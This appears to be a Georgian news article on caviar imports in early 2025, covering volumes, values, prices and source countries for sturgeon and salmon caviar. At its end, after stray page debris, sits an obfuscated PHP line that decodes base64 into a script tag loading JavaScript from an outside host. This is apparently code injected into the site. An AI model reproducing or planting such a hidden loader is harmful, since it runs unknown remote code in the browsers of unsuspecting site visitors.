gorgia
ავერსი jaluzi

2025 წლის იანვარ-მარტში საქართველომ ჯამში, 394.81 ათასი აშშ დოლარის ღირებულების 33 ტონა ხიზილალა იყიდა, რაც 16 წლის განმავლობაში (საგარეო ვაჭრობის პორტალზე მონაცემები 2009 წლიდან ქვეყნდება) მაქსიმალური მაჩვენებელია.

საუბარია, ორ კატეგორიაზე: ზუთხის ხიზილალასა (შავი ხიზილალა) და ხიზილალის შემცვლელებზე, ორაგულის ხიზილალაზე (წითელი ხიზილალა).

აღსანიშნავია, რომ 2024 წლის იგივე საანგარიშო პერიოდში ქვეყანაში 288.25 ათასი აშშ დოლარის ღირებულების 20 ტონა პროდუქტის იმპორტი განხორციელდა, 2023 წლის 1-ელ სამ თვეში 17 ტონა (378.32 ათასი აშშ დოლარის), 2022 წლის იანვარ-მარტში - 8 ტონა (109.08 ათასი აშშ დოლარის) და ა.შ.

ამასთან, მიმდინარე წელს იმპორტირებული ამ პროდუქციიდან 33.06 ტონა (326.2 ათასი აშშ დოლარი) ხიზილალის შემცვლელებსა და ორაგულის ხიზილალაზე მოდის; ხოლო, 190 კგ (68.5 ათასი აშშ დოლარი) - ზუთხის ხიზილალაზე.

ოფიციალური მონაცემების მიხედვით, წელს 1 კგ იმპორტირებული ზუთხის ხიზილალას ფასი საშუალოდ 360.9 აშშ დოლარი იყო; ხიზილალის შემცვლელების, ორაგულის ხიზილალის (წითელი ხიზილალა) კი - 9.8 აშშ დოლარი. (შენიშვნა: ფასი დათვლილია საშუალო მაჩვენებლებით, გადასახადების გარეშე).

ამასთან, „საქსტატის“ მონაცემების მიხედვით, წელს 3 თვეში ზუთხის ხიზილალა შემოვიდა შემდეგი ქვეყნებიდან:

ჩინეთი - 150 კგ (48.3 ათასი აშშ დოლარი);
იტალია - 30 კგ (16.7 ათასი აშშ დოლარი);
ასევე, მცირე მოცულობები საფრანგეთიდან და ლატვიიდან.

რაც შეეხება ხიზილალის შემცვლელებს და ორაგულის ხიზილალას (წითელი ხიზილალა), იმპორტიორი ქვეყნების ხუთეული ასეთია:

რუსეთი - 21.65 ტონა (194.18 ათასი აშშ დოლარი);
ბელარუსი - 5.14 ტონა (42.11 ათასი აშშ დოლარი);
ჩინეთი - 3.15 ტონა (69.62 ათასი აშშ დოლარი);
ნორვეგია - 3 ტონ (14.22 ათასი აშშ დოლარი);
გერმანია - 80 კგ (2.96 ათასი აშშ დოლარი).

111
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");